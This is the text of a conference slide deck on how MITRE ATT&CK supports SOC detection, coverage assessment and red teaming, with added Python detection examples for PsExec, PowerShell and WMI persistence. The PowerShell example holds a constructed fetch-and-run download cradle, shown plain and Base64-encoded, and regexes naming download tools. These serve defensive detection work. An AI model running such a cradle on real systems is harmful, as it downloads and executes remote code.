How MITRE ATT&CK helps security operations | PDF
Teymur Kheirkhabarov
Head of SOC R&D
Sergey Soldatov
Head of SOC
How MITRE ATT&CK helps security operations
Who is Sergey?
Since 2016: Head of SOC at Kaspersky Lab
  Internal SOC
  Commercial MDR* services
2012 – 2016: Chief manager at RN-Inform
  Rosneft security services insourcing
2002 – 2012: TNK-BP Group
  IT security integration into business and IT operations
  Security controls in IT projects
  Security operations
2001 – 2002: Software developer at RIPN
BMSTU graduate
CISA, CISSP
* Managed Detection and Response
Who is Teymur?
2016 – : Head of SOC R&D at Kaspersky Lab
  Development: sensors, sensor data, event processing, detection logic, SOC infrastructure
  SOC R&D team coordination and management
2011 – 2016: Head of Information Security
  IT security integration into business and IT operations
  Security controls in IT projects
  Security operations
Krasnoyarsk SibSAU graduate
Detect layers: David Bianco's pyramid of pain
http://detect-respond.blogspot.ru/2013/03/the-pyramid-of-pain.html
(Figure: pyramid of detect layers, bottom to top: IoC; AM signature, Yara; TTP*-based detect. Side labels: the lower layers are within the capabilities of commodity prevention/detection tools and can be done automatically; the TTP layer requires a human analyst)
* TTP – tactics, techniques and procedures
Different approaches to detection
Attacker activity: use Mimikatz for dumping authentication data (passwords/hashes) from memory
  IoC-based detection: search for hashes (MD5/SHA1/SHA256) of utilities that dump credentials
  Tool-based detection: search for files with specific extensions. For example, Mimikatz exports Kerberos tickets to .kirbi files, and WCE creates wceaux.dll
  TTP-based detection: search for processes that access LSASS memory; use of unsigned DLLs loaded into the LSASS process
Attacker activity: use PsExec for remote administration
  IoC-based detection: search for hashes (MD5/SHA1/SHA256) of utilities for remote administration
  Tool-based detection: search for installations of services typical for remote administration utilities. For example, PsExec installs the service PSEXESVC
  TTP-based detection: search for remote installation of a new service, and then that service starting a process
Attacker activity: C&C communication
  IoC-based detection: search for known C&C (IP/FQDN/URL)
  Tool-based detection: search for User-Agents typical for particular utilities/malware; search for use of a particular DGA typical for specific utilities/malware
  TTP-based detection: search for periodic network communication; search for communication with randomly generated domain names; search for communication with recently registered domains
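The PsExec row of the table, worked through as code: an added example (not from the talk) that runs the IoC, tool and TTP layers over constructed events. The event records, hosts, logon ids and the all-zero hash are invented; the field names only loosely follow Windows Security 4624/4697 and Sysmon event 1.

```python
# The three detection layers from the table above, applied to the PsExec row.
# Added example, not code from the talk: events are constructed and the field
# names only loosely follow Windows Security 4624/4697 and Sysmon event 1.
# Layer 1, IoC-based: file hashes of remote-administration utilities.
# Constructed placeholder, deliberately not a real PsExec hash.
KNOWN_BAD_SHA256 = {"0" * 64}
# Layer 2, tool-based: service names typical for remote administration
# utilities (PsExec installs a service named PSEXESVC).
REMOTE_ADMIN_SERVICES = {"PSEXESVC"}
# Constructed telemetry: 4624 = logon (type 3 = network), 4697 = service
# installed in the subject's logon session, 1 = Sysmon process creation.
EVENTS = [
    # ws07: unmodified PsExec, caught by all three layers
    {"id": 4624, "host": "ws07", "logon_id": "0x3e7a1", "logon_type": 3},
    {"id": 4697, "host": "ws07", "logon_id": "0x3e7a1", "service": "PSEXESVC",
     "path": r"C:\Windows\PSEXESVC.exe", "sha256": "0" * 64},
    {"id": 1, "host": "ws07", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\PSEXESVC.exe"},
    {"id": 1, "host": "ws07", "parent": r"C:\Windows\PSEXESVC.exe",
     "image": r"C:\Windows\System32\cmd.exe"},
    # srv01: rebuilt tool (new hash, new service name), only the TTP layer fires
    {"id": 4624, "host": "srv01", "logon_id": "0x51c2", "logon_type": 3},
    {"id": 4697, "host": "srv01", "logon_id": "0x51c2", "service": "UpdSvc",
     "path": r"C:\Windows\upd.exe", "sha256": "1" * 64},
    {"id": 1, "host": "srv01", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\upd.exe"},
    {"id": 1, "host": "srv01", "parent": r"C:\Windows\upd.exe",
     "image": r"C:\Windows\System32\cmd.exe"},
    # ws12: interactive (local) install of an ordinary service, nothing fires
    {"id": 4624, "host": "ws12", "logon_id": "0x77", "logon_type": 2},
    {"id": 4697, "host": "ws12", "logon_id": "0x77", "service": "Backup",
     "path": r"C:\Program Files\bk\bk.exe", "sha256": "2" * 64},
    {"id": 1, "host": "ws12", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files\bk\bk.exe"},
]

def ioc_detect(events):
    """Hosts where a known-bad hash was seen; defeated by recompiling the tool."""
    return {e["host"] for e in events if e.get("sha256") in KNOWN_BAD_SHA256}

def tool_detect(events):
    """Hosts where a remote-admin tool's service was installed; defeated by renaming."""
    return {e["host"] for e in events
            if e["id"] == 4697 and e["service"].upper() in REMOTE_ADMIN_SERVICES}

def ttp_detect(events):
    """Network logon -> service installed in that session -> service binary starts
    a child process. Describes the behaviour, not the tool."""
    network_logons = {(e["host"], e["logon_id"]) for e in events
                      if e["id"] == 4624 and e["logon_type"] == 3}
    remote_services = {(e["host"], e["path"].lower()) for e in events
                       if e["id"] == 4697 and (e["host"], e["logon_id"]) in network_logons}
    return {e["host"] for e in events
            if e["id"] == 1 and (e["host"], e["parent"].lower()) in remote_services}

def compare_layers(events=EVENTS):
    """Which hosts each layer flags on the same telemetry."""
    return {"ioc": ioc_detect(events), "tool": tool_detect(events), "ttp": ttp_detect(events)}
```

Only the TTP layer flags srv01, where the tool was rebuilt and renamed; the IoC and tool layers both stop at ws07.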
Tactics, Techniques and Procedures
Tactic – the way the threat actor operates during different steps of its operation/campaign. Tactics represent the “why” of an ATT&CK technique. It is the adversary’s tactical objective: the reason for performing an action.
Technique – the approach the threat actor uses to facilitate a Tactic. Techniques represent “how” an adversary achieves a tactical objective by performing an action. For example, an adversary may dump credentials to achieve credential access.
Procedure – the exact ways a particular adversary or piece of software implements a technique. These are described by the examples sections in ATT&CK techniques.
(Figure: Tactic (Why?) → Technique (How?) → Procedure (Particular implementation))
ATT&CK – Adversarial Tactics, Techniques and Common Knowledge
https://attack.mitre.org/matrices/enterprise/
(Figure: the Enterprise matrix; columns are Tactics, cells are Techniques)
Technique
https://attack.mitre.org/techniques/T1060/
(Figure: an ATT&CK technique page)
The importance of Procedure
For each Technique many Procedures can be introduced
There are Procedures that can’t be detected due to technological limitations
Not all Procedures are yet known
What do we detect? Procedure!
Where can Procedures be taken from? The ATT&CK technique description!
Good talks on the Internet
https://offzone.moscow/speakers/teymur-heirhabarov/
https://2017.zeronights.ru/report/hunting-for-credentials-dumping-in-windows-environment/
https://www.slideshare.net/heirhabarov/kheirkhabarov24052017phdays7
Examples of Techniques and corresponding Procedures
T1086: PowerShell
  ~ 45 000 PC, last 30 days period
  PowerShell in autorun
  PowerShell suspicious command lines (before adaptation / after adaptation)
  PowerShell download cradles
    https://gist.github.com/HarmJ0y/bb48307ffa663256e239#file-downloadcradles-ps1
  PowerShell obfuscation
    https://github.com/danielbohannon/Invoke-Obfuscation
  PowerShell Base64 encoding
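Detection heuristics for the three T1086 procedures named above (download cradles, obfuscation, Base64 -EncodedCommand), as an added example that is not the talk's own detection logic. The regexes, the allowlist that stands in for the "after adaptation" tuning step, and the sample command lines (which point at an invalid hostname) are all constructed here.

```python
# Heuristics for the T1086 procedures listed above: download cradles, obfuscation
# markers and Base64 -EncodedCommand. Added example, not the talk's detection logic;
# the sample command lines are constructed and point at an invalid hostname.
import base64
import re
# Download cradle primitives (see the HarmJ0y gist above) and their common aliases.
CRADLE = re.compile(r"(DownloadString|DownloadFile|DownloadData|Net\.WebClient|Invoke-WebRequest|"
                    r"\biwr\b|Invoke-RestMethod|Start-BitsTransfer|\bcurl\b|\bwget\b)", re.I)
IEX = re.compile(r"(Invoke-Expression|\biex\b)", re.I)
# Typical obfuscation leftovers: backtick-split tokens, char codes, string joins.
OBFUSCATION = re.compile(r"(`[a-z]|\[char\]\s*\d|'\s*\+\s*'|-join\b|\[scriptblock\]::create)", re.I)
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED = re.compile(r"\s-e[a-z]*\s+([A-Za-z0-9+/]{16,}={0,2})", re.I)
# "After adaptation": decoded payloads of known management jobs (constructed list).
ALLOWLIST = (re.compile(r"^Get-Process\b"),)

def decode_encoded_command(b64):
    """-EncodedCommand carries UTF-16LE text; None if the blob does not decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(cmdline):
    """Return (findings, decoded payload); the payload replaces the Base64 blob
    before scanning so the blob itself cannot produce accidental matches."""
    findings, decoded, text = set(), None, cmdline
    m = ENCODED.search(cmdline)
    if m:
        decoded = decode_encoded_command(m.group(1))
        if decoded is not None:
            findings.add("encoded_command")
            text = cmdline[:m.start(1)] + decoded + cmdline[m.end(1):]
    if CRADLE.search(text):
        findings.add("download_cradle")
    if IEX.search(text):
        findings.add("invoke_expression")
    if OBFUSCATION.search(text):
        findings.add("obfuscation")
    return findings, decoded

def is_suspicious(cmdline):
    """Encoding alone is noise in a large fleet (management agents use it):
    require a second indicator, and tune out allowlisted payloads."""
    findings, decoded = analyze(cmdline)
    if decoded is not None and any(p.search(decoded) for p in ALLOWLIST):
        return False
    return bool(findings - {"encoded_command"})

def encode_ps(script):
    """Build -EncodedCommand arguments for the constructed samples."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

CRADLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLES = {  # constructed command lines, not captured telemetry
    "plain_cradle": 'powershell.exe -nop -w hidden -c "' + CRADLE_SCRIPT + '"',
    "encoded_cradle": "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_ps(CRADLE_SCRIPT),
    "obfuscated": "powershell.exe -c \"$c='Get-'+'Proc'+'ess'; & ([scriptblock]::Create($c))\"",
    "encoded_admin_job": "powershell.exe -EncodedCommand " + encode_ps("Get-Process | Select-Object -First 5"),
}
```

The encoded cradle is caught because the decoded payload, not the Base64 text, is what gets scanned; the encoded admin job is the noise the tuning step removes.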
Examples of Techniques and corresponding Procedures
T1084: Windows Management Instrumentation Event Subscription
  ~ 146 000 PC, 1 year period
  Enumeration of installed ActiveScript consumers (before adaptation / after adaptation)
  Enumeration of installed CommandLine consumers (before adaptation / after adaptation)
  Malicious CommandLine event consumer
  Malicious ActiveScript event consumer
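The consumer enumeration above, in the form a defender would review it: an added example (not the talk's code) that joins filters, consumers and bindings, keeps only the CommandLine and ActiveScript consumer types, and applies an allowlist as the "after adaptation" step. The records are constructed to resemble an enumeration of the root\subscription namespace; only the SCM Event Log filter/consumer pair is the real Windows default, everything else is invented and the payloads are placeholders.

```python
# Review of WMI permanent event subscriptions (the T1084 procedure above): join
# filters, consumers and bindings, keep the consumer types that execute code and
# tune out known-benign entries. Added example; records are constructed.
import re
# The SCM Event Log entries are the default Windows subscription; the others are
# made-up persistence entries. Payloads are placeholders, not real commands.
FILTERS = [
    {"Name": "SCM Event Log Filter", "Query": "select * from MSFT_SCMEventLogEvent"},
    {"Name": "UpdaterFilter", "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 "
     "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"},
    {"Name": "LogonFilter", "Query": "SELECT * FROM __InstanceCreationEvent WITHIN 15 "
     "WHERE TargetInstance ISA 'Win32_LogonSession'"},
]
CONSUMERS = [
    {"__CLASS": "NTEventLogEventConsumer", "Name": "SCM Event Log Consumer"},
    {"__CLASS": "CommandLineEventConsumer", "Name": "UpdaterConsumer",
     "CommandLineTemplate": "powershell.exe -NoP -W Hidden -EncodedCommand <constructed-placeholder>"},
    {"__CLASS": "ActiveScriptEventConsumer", "Name": "LogonConsumer",
     "ScriptingEngine": "VBScript", "ScriptText": "' constructed placeholder script"},
]
# __FilterToConsumerBinding stores object references such as __EventFilter.Name="...";
# the last binding points at a consumer that no longer exists (dangling binding).
BINDINGS = [
    {"Filter": '__EventFilter.Name="SCM Event Log Filter"',
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"'},
    {"Filter": '__EventFilter.Name="UpdaterFilter"',
     "Consumer": 'CommandLineEventConsumer.Name="UpdaterConsumer"'},
    {"Filter": '__EventFilter.Name="LogonFilter"',
     "Consumer": 'ActiveScriptEventConsumer.Name="LogonConsumer"'},
    {"Filter": '__EventFilter.Name="LogonFilter"',
     "Consumer": 'CommandLineEventConsumer.Name="Removed"'},
]
EXECUTING_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
# "After adaptation": (class, name) pairs confirmed benign across the fleet.
ALLOWLIST = {("NTEventLogEventConsumer", "SCM Event Log Consumer")}
REF = re.compile(r'^(\w+)\.Name="([^"]+)"$')

def parse_ref(ref):
    """Split a WMI object reference into (class, name); None if malformed."""
    m = REF.match(ref)
    return (m.group(1), m.group(2)) if m else None

def payload(consumer):
    """What runs when the filter fires, for the analyst to read."""
    return (consumer.get("CommandLineTemplate") or consumer.get("ScriptFileName")
            or consumer.get("ScriptText") or "")

def review_subscriptions(filters=FILTERS, consumers=CONSUMERS, bindings=BINDINGS, allowlist=ALLOWLIST):
    """One record per binding whose consumer executes code and is not allowlisted."""
    by_filter = {f["Name"]: f for f in filters}
    by_consumer = {(c["__CLASS"], c["Name"]): c for c in consumers}
    findings = []
    for b in bindings:
        fref, cref = parse_ref(b["Filter"]), parse_ref(b["Consumer"])
        if not fref or not cref or cref in allowlist or cref[0] not in EXECUTING_CONSUMERS:
            continue
        consumer = by_consumer.get(cref)
        findings.append({"filter": fref[1],
                         "query": by_filter.get(fref[1], {}).get("Query", "<filter missing>"),
                         "consumer": cref[0] + "/" + cref[1],
                         "payload": payload(consumer) if consumer else "<consumer missing>"})
    return findings
```

A dangling binding is reported rather than skipped, since a consumer that was deleted after the binding was created is itself worth a look.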
Use case #1: Detects development
ATT&CK – one of the good sources of detect ideas
(Figure: detect development cycle)
  Attack emulation
  Analysis of detection capabilities
  Required processing
  Required telemetry
  Detect development, testing, publication
  Endless testing in operations
  Metrics
Other sources of detect ideas – TI from operations
Public
  Twitter, blogs, talks, etc.
  Tests*
Private
  Internal threat research
  Operations practice
  Threat hunting**
  DFIRMA***
  Security Assessment/Red teaming
* https://attackevals.mitre.org/evaluations.html , for example
** the practice of searching iteratively through data to detect [advanced] threats that evade automatic security solutions
*** Digital forensics, Incident response, Malware analysis
Use case #1’: Detects development priorities (post-breach)
Tactics priorities:
  Persistence
  Privilege escalation
  Defense evasion
  Credential access
  Lateral movement
  Execution
  …
Techniques priorities:
  Available telemetry
  Used by which APT actors, and how relevant are they to you?
  Required investments (~ risk assessment)
Use case #2: Detects classification
Detects management
  Understand current coverage
  • What do we have for each technique*?
  • Gap analysis
  Extend coverage
  • Add new detects?
  • Update existing?
Simplifies R&D team work
* Through appropriate Procedure
Detects (“Hunts”) mapped to MITRE techniques
Use case #3: SOC Analyst’s body of knowledge
Attack kill chain (tactics)
Descriptions of the attack techniques known so far
Public reports about actual APT campaigns, linked to the techniques used
Recommendations on detection and mitigation
In addition:
• OS architecture
• Known attacker’s toolset
• Not hypothetical attacks, but ones taken from practice*
* https://reply-to-all.blogspot.com/2013/01/blog-post.html
Use case #4: detect rate assessment by ATT&CK coverage
Choose a scenario (sequence of particular procedures)*
Execute it in the lab and see the detects
Evaluate based on detection types**:
  Telemetry
  Enrichment
  Behavior detect
Now results can be compared***
Whether the techniques can be considered covered based on the test is an open question – it depends on the actual procedures used in the test
* https://attackevals.mitre.org/
** https://attackevals.mitre.org/methodology/detection-categorization.html
*** https://reply-to-all.blogspot.com/2018/12/mitre-edr.html
MITRE ATT&CK Evaluations
Particular Procedures:
  APT3: 56 Enterprise techniques across 10 tactics
  “Living off the land”*
  Focus on “Primary” techniques**, on behavior and not on tools and IoCs
  2 scenarios: 10-step with Cobalt Strike + 10-step with Empire***
  Same lab environment for all vendors
Detection categorization
  Main detection types:
  • None
  • Telemetry
  • Indicator of Compromise
  • Enrichment
  • General behavior
  • Specific behavior
  Modifiers:
  • Delayed
  • Tainted
  • Configuration change
* https://www.youtube.com/watch?v=j-r6UonEkUw
** Differentiate “Primary” and “Enabling” techniques. “Enabling” - many of the techniques required Command-Line Interface, Execution through API, and PowerShell. In the assessment MITRE focused on the Primary technique that was performed, rather than the mechanism of execution (which was considered the Enabling technique)
*** https://www.cobaltstrike.com/ ; https://github.com/EmpireProject/Empire
BAS: Breach and Attack Simulation
METTA
  https://github.com/uber-common/metta
Caldera
  https://github.com/mitre/caldera
Unfetter
  https://mitre.github.io/unfetter/
Endgame
  https://github.com/endgameinc/RTA
Red Canary – Atomic Red Team
  https://github.com/redcanaryco/atomic-red-team
Microsoft
  https://blogs.technet.microsoft.com/motiba/2018/04/09/invoke-adversary-simulating-adversary-operations/
KaLaBAS?
  Existing tools are vendor-specific
  Not enough tests
  Need to integrate into the existing auto-testing infrastructure
Use case #5: Adversary emulation, red teaming
Common framework for Red team, Blue team and Purple team collaboration
Create adversary emulation scenarios: choose relevant TTPs
Create a red team plan: choose TTPs that might be missed by the existing Blue team
Gap analysis of current defensive technologies – prioritize future investments
SOC operational efficiency (maturity) assessment
!!DEMO!!
Let’s talk?